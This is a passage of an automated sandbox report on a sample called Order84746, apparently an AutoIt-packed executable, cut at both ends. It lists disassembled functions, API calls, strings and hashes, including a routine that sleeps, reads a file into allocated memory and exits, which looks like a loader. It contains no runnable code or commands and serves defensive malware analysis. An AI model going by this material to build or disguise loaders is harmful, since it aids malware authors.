                          • ___createFile.LIBCMT ref: 00916361
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0091636E
                          • __dosmaperr.LIBCMT ref: 00916375
                          • __free_osfhnd.LIBCMT ref: 00916395
                          • __invoke_watson.LIBCMT ref: 009163C3
                          • __wsopen_helper.LIBCMT ref: 009163DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                          • String ID: @
                          • API String ID: 3896587723-2766056989
                          • Opcode ID: 5c16754d16edef8df1ae95b25764db5c63790a7d672ee78e667fc32dcf978485
                          • Instruction ID: 5d63af28fc21109e1d93144276d5e339131b1a932d718299dbe2783871eea91a
                          • Opcode Fuzzy Hash: 5c16754d16edef8df1ae95b25764db5c63790a7d672ee78e667fc32dcf978485
                          • Instruction Fuzzy Hash: CC223371F0460D9FEB259F68DC45BFD7B69EB84324F2A4628E9219B2D1C2398DC0C791
                          Function 0090EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit
                          • String ID:
                          • API String ID: 3074181302-0
                          • Opcode ID: 5febfd0ae0482b4075eeec0ed414bfaf24887a8e11a777e36e3e56ee3ebbba6d
                          • Instruction ID: d58153843b152679cd32aaafebe0a07864f5c345e2903d666d8b450a7a4669c0
                          • Opcode Fuzzy Hash: 5febfd0ae0482b4075eeec0ed414bfaf24887a8e11a777e36e3e56ee3ebbba6d
                          • Instruction Fuzzy Hash: B8327871E08246CFDB31CF68C850BBDBBB5AF86314F24446AE8559B6D2C7349E41CBA0
                          Function 0092FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • _wcscpy.LIBCMT ref: 0092FA96
                          • _wcschr.LIBCMT ref: 0092FAA4
                          • _wcscpy.LIBCMT ref: 0092FABB
                          • _wcscat.LIBCMT ref: 0092FACA
                          • _wcscat.LIBCMT ref: 0092FAE8
                          • _wcscpy.LIBCMT ref: 0092FB09
                          • __wsplitpath.LIBCMT ref: 0092FBE6
                          • _wcscpy.LIBCMT ref: 0092FC0B
                          • _wcscpy.LIBCMT ref: 0092FC1D
                          • _wcscpy.LIBCMT ref: 0092FC32
                          • _wcscat.LIBCMT ref: 0092FC47
                          • _wcscat.LIBCMT ref: 0092FC59
                          • _wcscat.LIBCMT ref: 0092FC6E
                            • Part of subcall function 0092BFA4: _wcscmp.LIBCMT ref: 0092C03E
                            • Part of subcall function 0092BFA4: __wsplitpath.LIBCMT ref: 0092C083
                            • Part of subcall function 0092BFA4: _wcscpy.LIBCMT ref: 0092C096
                            • Part of subcall function 0092BFA4: _wcscat.LIBCMT ref: 0092C0A9
                            • Part of subcall function 0092BFA4: __wsplitpath.LIBCMT ref: 0092C0CE
                            • Part of subcall function 0092BFA4: _wcscat.LIBCMT ref: 0092C0E4
                            • Part of subcall function 0092BFA4: _wcscat.LIBCMT ref: 0092C0F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 2955681530-2806939583
                          • Opcode ID: 1347aaea72ffb9a7c4e061f1a945fb0fbf13d805fc942ab87893a7f852467568
                          • Instruction ID: 2c8da425bf74025b160c4f8294d235bb6aa78488b0bbee23fffadea26f52403f
                          • Opcode Fuzzy Hash: 1347aaea72ffb9a7c4e061f1a945fb0fbf13d805fc942ab87893a7f852467568
                          • Instruction Fuzzy Hash: 3891AD72504355AFDB20EB54D851F9FB3E8FF94300F048869F99997292DB34EA48CB92
                          Function 0092BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1005 92bfa4-92c054 call 90f8a0 call 8ff4ea call 8e47b7 call 92bdb4 call 8e4517 call 9015e3 1018 92c107-92c10e call 92c56d 1005->1018 1019 92c05a-92c061 call 92c56d 1005->1019 1024 92c110-92c112 1018->1024 1025 92c117 1018->1025 1019->1024 1026 92c067-92c105 call 901dfc call 900d23 call 900cf4 call 901dfc call 900cf4 * 2 1019->1026 1027 92c367-92c368 1024->1027 1029 92c11a-92c1d6 call 8e44ed * 8 call 92c71a call 903499 1025->1029 1026->1029 1030 92c385-92c393 call 8e47e2 1027->1030 1064 92c1d8-92c1da 1029->1064 1065 92c1df-92c1fa call 92bdf8 1029->1065 1064->1027 1068 92c200-92c208 1065->1068 1069 92c28c-92c298 call 9035e4 1065->1069 1070 92c210 1068->1070 1071 92c20a-92c20e 1068->1071 1076 92c29a-92c2a9 DeleteFileW 1069->1076 1077 92c2ae-92c2b2 1069->1077 1073 92c215-92c233 call 8e44ed 1070->1073 1071->1073 1083 92c235-92c23b 1073->1083 1084 92c25d-92c273 call 92b791 call 902aae 1073->1084 1076->1027 1079 92c342-92c356 CopyFileW 1077->1079 1080 92c2b8-92c32f call 92c81d call 92c845 call 92b965 1077->1080 1081 92c36a-92c380 DeleteFileW call 92c6d9 1079->1081 1082 92c358-92c365 DeleteFileW 1079->1082 1080->1081 1101 92c331-92c340 DeleteFileW 1080->1101 1081->1030 1082->1027 1088 92c23d-92c250 call 92bf2e 1083->1088 1097 92c278-92c283 1084->1097 1098 92c252-92c25b 1088->1098 1097->1068 1100 92c289 1097->1100 1098->1084 1100->1069 1101->1027
                          APIs
                            • Part of subcall function 0092BDB4: __time64.LIBCMT ref: 0092BDBE
                            • Part of subcall function 008E4517: _fseek.LIBCMT ref: 008E452F
                          • __wsplitpath.LIBCMT ref: 0092C083
                            • Part of subcall function 00901DFC: __wsplitpath_helper.LIBCMT ref: 00901E3C
                          • _wcscpy.LIBCMT ref: 0092C096
                          • _wcscat.LIBCMT ref: 0092C0A9
                          • __wsplitpath.LIBCMT ref: 0092C0CE
                          • _wcscat.LIBCMT ref: 0092C0E4
                          • _wcscat.LIBCMT ref: 0092C0F7
                          • _wcscmp.LIBCMT ref: 0092C03E
                            • Part of subcall function 0092C56D: _wcscmp.LIBCMT ref: 0092C65D
                            • Part of subcall function 0092C56D: _wcscmp.LIBCMT ref: 0092C670
                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0092C2A1
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0092C338
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0092C34E
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0092C35F
                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0092C371
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                          • String ID:
                          • API String ID: 2378138488-0
                          • Opcode ID: 60e4b496166f21a072d7140e376521c330671d1403624796c4a5474586ad4a47
                          • Instruction ID: 036897235881a4c2db808bfc9cf583777ab32cf4a39eaa7c9b2a426ad240e0c2
                          • Opcode Fuzzy Hash: 60e4b496166f21a072d7140e376521c330671d1403624796c4a5474586ad4a47
                          • Instruction Fuzzy Hash: 5FC12AB1A00229AFDF11DF95DC81EDEB7BCEF89304F1040AAF609E6155DB709A848F65
                          Function 008E3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 008E3E79
                          • LoadCursorW.USER32(00000000,00007F00), ref: 008E3E88
                          • LoadIconW.USER32(00000063), ref: 008E3E9E
                          • LoadIconW.USER32(000000A4), ref: 008E3EB0
                          • LoadIconW.USER32(000000A2), ref: 008E3EC2
                            • Part of subcall function 008E4024: LoadImageW.USER32(008E0000,00000063,00000001,00000010,00000010,00000000), ref: 008E4048
                          • RegisterClassExW.USER32(?), ref: 008E3F30
                            • Part of subcall function 008E3F53: GetSysColorBrush.USER32(0000000F), ref: 008E3F86
                            • Part of subcall function 008E3F53: RegisterClassExW.USER32(00000030), ref: 008E3FB0
                            • Part of subcall function 008E3F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008E3FC1
                            • Part of subcall function 008E3F53: LoadIconW.USER32(000000A9), ref: 008E4004
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                          • String ID: #$0$AutoIt v3
                          • API String ID: 2880975755-4155596026
                          • Opcode ID: 1a400d08d2c33f6ade930bc8e92044175b7fbabd9a22ebd0b710d5bfbdf436dd
                          • Instruction ID: 09bfe388fa154c811cb9f71216fc4c8b86489d611e49efc650e3ced4d558fcf9
                          • Opcode Fuzzy Hash: 1a400d08d2c33f6ade930bc8e92044175b7fbabd9a22ebd0b710d5bfbdf436dd
                          • Instruction Fuzzy Hash: 6E2131B4E1C354ABCB04DFA9EC49A99BBF5FF49314F00412EE614A32A0D7754644AFD1
                          Function 008E3F53 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 008E3F86
                          • RegisterClassExW.USER32(00000030), ref: 008E3FB0
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008E3FC1
                          • LoadIconW.USER32(000000A9), ref: 008E4004
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 975902462-1005189915
                          • Opcode ID: 412b45a59f84a1c54e31a5a21b5d2dd683255a8ff50779435db667c815a5b676
                          • Instruction ID: 9d01e7467396f68e317755272999e4c9d2defec9524b6971e26623243b0538cf
                          • Opcode Fuzzy Hash: 412b45a59f84a1c54e31a5a21b5d2dd683255a8ff50779435db667c815a5b676
                          • Instruction Fuzzy Hash: F821C5B5E29318AFDB00DFA5EC89BCDBBB4FB09700F04411AF625E62A0D7B54544AF91
                          Function 011DB228 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1237 11db228-11db2d6 call 11d8c38 1240 11db2dd-11db303 call 11dc138 CreateFileW 1237->1240 1243 11db30a-11db31a 1240->1243 1244 11db305 1240->1244 1252 11db31c 1243->1252 1253 11db321-11db33b VirtualAlloc 1243->1253 1245 11db455-11db459 1244->1245 1246 11db49b-11db49e 1245->1246 1247 11db45b-11db45f 1245->1247 1249 11db4a1-11db4a8 1246->1249 1250 11db46b-11db46f 1247->1250 1251 11db461-11db464 1247->1251 1256 11db4fd-11db512 1249->1256 1257 11db4aa-11db4b5 1249->1257 1258 11db47f-11db483 1250->1258 1259 11db471-11db47b 1250->1259 1251->1250 1252->1245 1254 11db33d 1253->1254 1255 11db342-11db359 ReadFile 1253->1255 1254->1245 1260 11db35b 1255->1260 1261 11db360-11db3a0 VirtualAlloc 1255->1261 1264 11db514-11db51f VirtualFree 1256->1264 1265 11db522-11db52a 1256->1265 1262 11db4b9-11db4c5 1257->1262 1263 11db4b7 1257->1263 1266 11db485-11db48f 1258->1266 1267 11db493 1258->1267 1259->1258 1260->1245 1268 11db3a7-11db3c2 call 11dc388 1261->1268 1269 11db3a2 1261->1269 1270 11db4d9-11db4e5 1262->1270 1271 11db4c7-11db4d7 1262->1271 1263->1256 1264->1265 1266->1267 1267->1246 1277 11db3cd-11db3d7 1268->1277 1269->1245 1274 11db4e7-11db4f0 1270->1274 1275 11db4f2-11db4f8 1270->1275 1273 11db4fb 1271->1273 1273->1249 1274->1273 1275->1273 1278 11db3d9-11db408 call 11dc388 1277->1278 1279 11db40a-11db41e call 11dc198 1277->1279 1278->1277 1284 11db420 1279->1284 1285 11db422-11db426 1279->1285 1284->1245 1287 11db428-11db42c CloseHandle 1285->1287 1288 11db432-11db436 1285->1288 1287->1288 1289 11db438-11db443 VirtualFree 1288->1289 1290 11db446-11db44f 1288->1290 1289->1290 1290->1240 1290->1245
                          APIs
                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011DB2F9
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011DB51F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: CreateFileFreeVirtual
                          • String ID:
                          • API String ID: 204039940-0
                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                          • Instruction ID: ee785dd32cac538dc2ce8f7b7fbc22249f5d6217056ff124d0cb7362596f741e
                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                          • Instruction Fuzzy Hash: 2DA11A70E04209EBDB18CFA4C894BEEBBB5FF49304F208559E616BB280D7759A41CF55
                          Function 008E49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1346 8e49fb-8e4a25 call 8ebcce RegOpenKeyExW 1349 8e4a2b-8e4a2f 1346->1349 1350 9541cc-9541e3 RegQueryValueExW 1346->1350 1351 9541e5-954222 call 8ff4ea call 8e47b7 RegQueryValueExW 1350->1351 1352 954246-95424f RegCloseKey 1350->1352 1357 954224-95423b call 8e6a63 1351->1357 1358 95423d-954245 call 8e47e2 1351->1358 1357->1358 1358->1352
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008E4A1D
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009541DB
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0095421A
                          • RegCloseKey.ADVAPI32(?), ref: 00954249
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: QueryValue$CloseOpen
                          • String ID: Include$Software\AutoIt v3\AutoIt
                          • API String ID: 1586453840-614718249
                          • Opcode ID: e0c53a35ae4fd9923c2ce7cceb3ff07316c57dcc8439f4f2ccb234e7612ce096
                          • Instruction ID: 67031e3133debdc2d72183b29279fba52e933db9a6354da9fe80257f522c6638
                          • Opcode Fuzzy Hash: e0c53a35ae4fd9923c2ce7cceb3ff07316c57dcc8439f4f2ccb234e7612ce096
                          • Instruction Fuzzy Hash: DE117F71A01118BFEB00EBA9CD86DBF7BBCEF15358F004068F516D2191EA709E45EB50
                          Function 008E36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1373 8e36b8-8e3728 CreateWindowExW * 2 ShowWindow * 2
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E36E6
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E3707
                          • ShowWindow.USER32(00000000,?,?,?,?,008E3AA3,?), ref: 008E371B
                          • ShowWindow.USER32(00000000,?,?,?,?,008E3AA3,?), ref: 008E3724
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: f3c6edcc2883036dbc8fcd4c09365f43665bb1f349d1e118ec12cc96b45b9a8d
                          • Instruction ID: 947b661c8a1fdc5215538cd569020dca2d7b7e22ac25c0fae73a8929522cb151
                          • Opcode Fuzzy Hash: f3c6edcc2883036dbc8fcd4c09365f43665bb1f349d1e118ec12cc96b45b9a8d
                          • Instruction Fuzzy Hash: 78F0D0B1A592F07AD73157576C0CE673E7DDBC7F64F00401EFA08921A0C5610895EAF1
                          Function 011DAFE8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1478 11dafe8-11db120 call 11d8c38 call 11daed8 CreateFileW 1485 11db127-11db137 1478->1485 1486 11db122 1478->1486 1489 11db13e-11db158 VirtualAlloc 1485->1489 1490 11db139 1485->1490 1487 11db1d7-11db1dc 1486->1487 1491 11db15c-11db173 ReadFile 1489->1491 1492 11db15a 1489->1492 1490->1487 1493 11db175 1491->1493 1494 11db177-11db1b1 call 11daf18 call 11d9ed8 1491->1494 1492->1487 1493->1487 1499 11db1cd-11db1d5 ExitProcess 1494->1499 1500 11db1b3-11db1c8 call 11daf68 1494->1500 1499->1487 1500->1499
                          APIs
                            • Part of subcall function 011DAED8: Sleep.KERNELBASE(000001F4), ref: 011DAEE9
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011DB116
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: CreateFileSleep
                          • String ID: 1PNWTCCBAY8T35WHG
                          • API String ID: 2694422964-2517333615
                          • Opcode ID: ba388c8fcf4651ca6ef89b7b2e8379541b96320d13a3ba463b31311115bbdf78
                          • Instruction ID: d7122f979a1912325ef650f879f5735af6cc19ffbef1c81f1455da807f536a5f
                          • Opcode Fuzzy Hash: ba388c8fcf4651ca6ef89b7b2e8379541b96320d13a3ba463b31311115bbdf78
                          • Instruction Fuzzy Hash: 6051B430D08248DBEF15DBB8D854BEEBB74AF19304F004198E649BB2C0D7B90B45CBA5
                          Function 008E51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1502 8e51af-8e51c5 1503 8e51cb-8e51e0 call 8e6b0f 1502->1503 1504 8e52a2-8e52a6 1502->1504 1507 953ca1-953cb0 LoadStringW 1503->1507 1508 8e51e6-8e5206 call 8e6a63 1503->1508 1511 953cbb-953cd3 call 8e510d call 8e4db1 1507->1511 1508->1511 1512 8e520c-8e5210 1508->1512 1520 8e5220-8e529d call 900d50 call 8e50e6 call 900d23 Shell_NotifyIconW call 8ecb37 1511->1520 1524 953cd9-953cf7 call 8e518c call 8e4db1 call 8e518c 1511->1524 1514 8e5216-8e521b call 8e510d 1512->1514 1515 8e52a7-8e52b0 call 8e6eed 1512->1515 1514->1520 1515->1520 1520->1504 1524->1520
                          APIs
                          • _memset.LIBCMT ref: 008E522F
                          • _wcscpy.LIBCMT ref: 008E5283
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E5293
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00953CB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_memset_wcscpy
                          • String ID: Line:
                          • API String ID: 1053898822-1585850449
                          • Opcode ID: 88fb20e82964c95f2068e09b369293024f16785d82aa708bc1d15a379e7f2f1f
                          • Instruction ID: 361617a1d7a51f661c6a367259b83b643c704bcf80f5129b0c294aa704e778f3
                          • Opcode Fuzzy Hash: 88fb20e82964c95f2068e09b369293024f16785d82aa708bc1d15a379e7f2f1f
                          • Instruction Fuzzy Hash: 0431BC71508790AED320EB65DC42FDB77D8FF86358F00451EF699D2092EB70A6488B97
                          Function 008E40E5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00953725
                            • Part of subcall function 008E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E53B1,?,?,008E61FF,?,00000000,00000001,00000000), ref: 008E662F
                            • Part of subcall function 008E40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E40C6
                          Strings
                          Memory Dump Source
